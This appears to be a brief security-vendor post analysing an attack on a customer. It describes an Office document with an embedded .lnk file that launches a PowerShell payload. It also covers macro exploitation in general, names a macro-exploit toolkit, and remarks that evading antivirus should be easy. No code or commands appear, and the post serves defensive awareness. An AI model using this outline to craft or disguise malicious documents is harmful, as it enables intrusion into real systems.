Using office macros to exploit endpoints continues to be a popular method for exploitation. Users are presented with a dialog box, which they must click for the attack to work, most users will click, especially if the document looks like something they normally operate on. This removes the need for attackers to have office or browser zero-days. It also makes exploitation simpler and cheaper. Additionally, it is typically possible to tune the malicious macro to bypass security controls like anti-virus. There are even toolkits like Luckystrike to ease macro exploit development.
There are controls within Windows domains, which can be activated to stop macros from executing. There are also security tools that can sandbox, scan, or even put untrusted documents into VMs.
We began investigating an attack that hit one of our customers. We found that it was an office document with an embedded link (.lnk) file. The image of the .lnk must be clicked by the user, this is all but certain to happen.
When the exploit is running on the victim:
- The malicious LNK is detected, and code is shown
- Payload is run with PowerShell
- Payload is noticed – but the hash is wrong because the file size is empty. This is because the malware site was moved by the attackers by the time we checked into this threat.
VT Shows the Doc to be Malicious
Only 19 of 55 anti-virus engines believe the threat we found was malicious. Tweaking it to make the attack fresh to bypass all the AVs should be straight forward.
Summary
Embedded LNK files can and will be used to exploit enterprise systems. Expect attackers to use them to even bypass next generation endpoint security controls.